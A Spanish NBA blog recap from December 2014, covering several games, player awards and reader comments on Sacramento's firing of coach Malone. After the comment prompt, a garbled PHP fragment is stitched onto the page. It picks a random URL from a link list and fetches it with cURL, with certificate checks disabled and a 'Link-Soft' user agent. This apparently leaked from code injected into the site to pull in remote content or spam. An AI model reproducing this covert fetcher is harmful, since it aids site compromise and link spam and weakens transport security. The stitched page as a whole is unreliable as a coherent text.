La Crónica: El salvaje Oeste

17 de December de 2014 por FranGuaita

La asombrosa racha de victorias de Golden State se detiene en dieciséis. Memphis frenó a los Warriors con MVP Gasol al frente. El hombre de la ceja recupera su mejor versión para despertar a New Orleans en un portentoso último cuarto ante Utah. Además, Dallas se pasea en el Madison y la sociedad Westbrook-Durant barre a Sacramento. Pasen y lean…

GRIZZLIES 105 – WARRIORS 98

Si Marc Gasol hubiera podido escribir un guión imaginario previo a la batalla de colosos del salvaje Oeste disputada esta madrugada en el estado de Tennessee, probablemente no hubiera diferido en demasía de la realidad. Aprovechando la ausencia de la sociedad interior de Golden State (Bogut-Lee), el Rey Sol de los Grizzlies impuso su ley en la pintura (24 puntos, 7 rebotes) para romper la racha de los Warriors. Dieciséis partidos consecutivos había encadenado sin conocer la derrota el equipo que dirige Steve Kerr. Quizá por ello sorprende más si cabe el parcial de 20-0 en contra encajado en el arranque del segundo cuarto. La unidad de reserva de los osos acudió a la llamada, firmando un parcial de 33-19 en ese periodo, con especial protagonismo para Vince Carter, que enchufó tres triples antes del descanso. Tras el paso por vestuarios, Golden State remó de forma impecable hasta a colocarse a dos con un mate de Livingston a falta de cinco minutos (90-88), pero siete puntos consecutivos de Memphis provocaron la tercera derrota en toda la temporada de los Warriors, que, pese a ello, siguen siendo el mejor equipo de la liga (21-3). La ventaja, eso sí, queda reducida a un partido. Memphis (20-4) supone una amenaza real.

KNICKS 87 – MAVERICKS 107

Desgraciadamente para los seguidores de NY, perder de 20 no es una ninguna sorpresa. Es la octava vez en 27 partidos que NY cae derrotado por diez o más puntos. Si el rival que está enfrente ofrece además la riqueza de recursos exhibida por los Mavericks en el Madison, competir se convierte en una auténtica utopía. Dallas acudió a su versión más coral para pasearse en La Gran Manzana. 16 puntos de Dirk Nowitzki por aquí, 14 rebotes de Tyson Chandler por allá, dobles figuras desde el banquillo a cargo de JJ Barea y Devin Harris… Un repaso en toda regla, vaya. En los Knicks sólo Melo salvó el tipo con 26 puntos conquistados viviendo en la barrera del 50% en tiros de campo. Es la duodécima derrota de New York en trece partidos. Con un balance de 5-22, no cierran el Este gracias a la paupérrima temporada de Philadelphia. De lo contrario, serían el peor equipo de la conferencia. Malos tiempos para la lírica en el cruce de la 33 con la Séptima.

KINGS 92 – THUNDER 104

Oklahoma sigue con su admirable escalada hacia las cumbres borrascosas de la Western. Con la misión en marcha, salir indemne de pabellones especialmente hostiles como el Sleep Train Arena de Sacramento fortalece el alma. En el momento decisivo de partido -un 12-2 de parcial cerrado a falta de 2:47 con dos tiros libres de Russell Westbrook– los Thunder fueron el equipo temible de las últimas temporadas. El one-two punce RW-KD al frente de las operaciones delante y detrás. Tiro exterior de Kevin Durant, robos y coast to coast vertiginosos de Westbrook (32 puntos, 7 asistencias), ideas muy claras en estático… Enfrente, Tyrone Corbin no acertó con la tecla en su estreno tras el cese de Malone. Con todo lo que ha llovido, Oklahoma ya está a tan sólo un partido del 50%.

NETS 91 – HEAT 95

Ni el retraso de casi media hora por una fuga de agua en el Barclays Center logró apagar el juego exuberante de Dwayne Wade anoche en Brooklyn. Ante la ausencia de Chris Bosh, el triple campeón de la NBA (2006, 2012 y 2013) anotó 28 puntos, además de capturar 5 rebotes y repartir 4 asistencias. Bojan Bogdanovic apretó las tuercas de Miami con un triple en la recta final de partido que redujo a cuatro la desventaja de los Nets, pero la franquicia de Florida consiguió escapar de Long Island con una W de calidad en el zurrón. Es la segunda vez que ambas franquicias se ven las caras esta temporada regular y la segunda victoria de Miami.

PELICANS 119 – JAZZ 111

Cuando lean estas líneas, el Smoothie King Center seguirá frotándose los ojos rememorando el último cuarto de New Orleans. Un incontestable parcial de 41-22 ha permitido a los Pelicans remontar una desventaja de 14 puntos e igualar su balance de victorias y derrotas (12-12) a unos días de la Navidad. Con Anthony Davis al 100% todo es más fácil. El hombre de la ceja regresó a pleno rendimiento tras las molestias por un golpetazo en el pecho que le forzaron a disputar únicamente 8 minutos del partido ante Cleveland. Davis ha firmado una hoja de servicios con 31 puntos, 9 rebotes y una serie de 12/15 en tiros de campo. En Utah, gran partido del turco Enes Kanter (29 puntos, 7 rebotes).

WIZARDS 109 – TIMBERWOLVES 95

En su primera aparición tras ser nominado jugador de la semana, John Wall siguió acumulando numerazos para repetir galardón dentro de unos días. El jugón de Raleigh enchufó 21 puntos además de igualar su mejor registro de asistencias NBA -17- para guiar el cómodo triunfo de Washington ante Minnesota. Siete jugadores de los Wizards alcanzaron las dobles figuras, mención especial para los 23 puntos que generó Rasual Butler desde la segunda unidad. Con su triunfo de esta madrugada, el equipo que dirige Randy Wittman está únicamente a medio partido de Toronto, líder de la conferencia Este.

PREMIOS

MVP: Retorno a lo grande de la bestia de Kentucky. 31 puntos (12 de 15 en TC), 9 rebotes y 3 tapones de Anthony Davis ante los Jazz. Russell Westbrook sigue maravillando partido tras partido desde que volvió de su lesión. 32 puntos, 6 rebotes, 7 asistencias y 4 robos para el escolta de los Thunder.

Rookie: 12 puntos, 2 rebotes, 2 asistencias, 1 robo y 1 tapón. Números como los que consiguió ayer ante los Pelicans son los que se esperan de Dante Exum. Veremos si consigue algo más regular en el futoro.

Sorpresa: Partido grande de Ryan Anderson que parece haber comenzado la temporada a medio gas. Suyos fueron 28 puntos con 6 triples incluidos complementados con 4 rebotes y 2 robos. Rasual Butler está destacando últimamente en Washington y el partido de ayer, con 23 puntos y 5 rebotes, no fue ena excepción. De todas maneras nada parece más impresionante que los 6 puntos, 9 rebotes y 3 asistencias de Ryan Hollins en 17 minutos.

Decepción: Venía disputando muy buenos partidos pero anoche Jrue Holiday se quedó en sólo 4 puntos y además perdió 3 balones.

Esfuerzo en vano: El mejor partido de la temporada Enes Kanter (29p – 7r – 2rb) no encontró premio. Tampoco el de Carmelo Anthony (26-5-5-4) pero lo de los Knicks ya no sorprende a nadie.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. rumbero dice:
    #1

    Llevo un par de días out y leyendo la crónica me acabo de enterar que han echado a Malone. Sinceramente no lo entiendo. Vale que llevan una mala racha pero Cousins debe llevar como 10 partidos sin jugar. Si es que mirando atrás debe ser el año que han empezado mejor y aun así no han tenido ni un mes de paciencia. Y todo esto para que se quede el equipo Corbin…a ver como les va

      Citar

  2. Denise dice:
    #2

    rumbero:
    Llevo un par de días out y leyendo la crónica me acabo de enterar que han echado a Malone. Sinceramente no lo entiendo.Vale que llevan una mala racha pero Cousins debe llevar como 10 partidos sin jugar. Si es que mirando atrás debe ser el año que han empezado mejor y aun así no han tenido ni un mes de paciencia. Y todo esto para que se quede el equipo Corbin…a ver como les va

    Yo tambien me acabo de enterar y tampoco lo entiendo. No sé si ha habido algun enfrentamiento pesos del vestuario vs Malone, pero este año estaban cuajando una notoria temporada.
    Y ahora ponen a este Corbin, el merluzo que el año pasado mandó a Rudy Gobert a la D-League para tener en cancha a Biedrins

      Citar

  3. txusma dice:
    #3

    Lo de Malone es muuuy largo de explicar. Tanto que mejor os enlazo este gran artículo de “Cronica desde el Sofa”: http://lacronicadesdeelsofa.com/2014/12/15/creando-los-sacramento-cherrypickers/

      Citar

  4. rumbero dice:
    #4

    txusma:
    Lo de Malone es muuuy largo de explicar. Tanto que mejor os enlazo este gran artículo de “Cronica desde el Sofa”: http://lacronicadesdeelsofa.com/2014/12/15/creando-los-sacramento-cherrypickers/

    Brutal. Ojalá nuestros ojos vean a los Palomero Kings

      Citar

  5. dunc dice:
    #5

      Citar

  6. Ruxixón dice:
    #6

    Lo que he podido leer del despido de Malone es que nunca hubo comunión entre el GM y él (hubo muy poco tiempo entre la contratación de uno y otro,favorable a Malone) y que además de eso había voces que asesoraban a los jefes,cercanos a D’Alessandro (sobre todo el legendario Chris Mullin).Todo eso derivó en un distanciamiento entre el indio y Malone que se agigantó con el intento de traspaso por Josh Smith (Malone no lo quería) y las entrevistas de hombres como Gentry (ex de Suns,ahora asistente en GSW) para ocupar el rol de asistente,algo que Malone vio como una amenaza,como el recambio por si la temporada no iba bien.

    A ver ahora,pero algo de mérito tendrá que Gay y Cousins hayan dado lo mejor de si mismos bajo las órdenes de ya “ex” de los Kings y la personalidad sobre todo del segundo como para tocarle las pelotas.Aparte lo de jugar rápido con estos tíos no lo veo.Eso sí,nunca se le acaban las ganas a uno de ver el mostacho de D’Antoni de nuevo xDD

    ¡Qué pena lo de Jabari!A ver si supone un batacazo moral para Milwaukee.En teoría deberían reponerse debido al juego coral del equipo,sería meter a Middlenton en el quinteto y a intentar recuperar a los lesionados,que son unos cuantos,para aumentar la producción de la segunda unidad.

    @dunc: lo de Iguodala imitando los pasos da pa unas risas,jaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>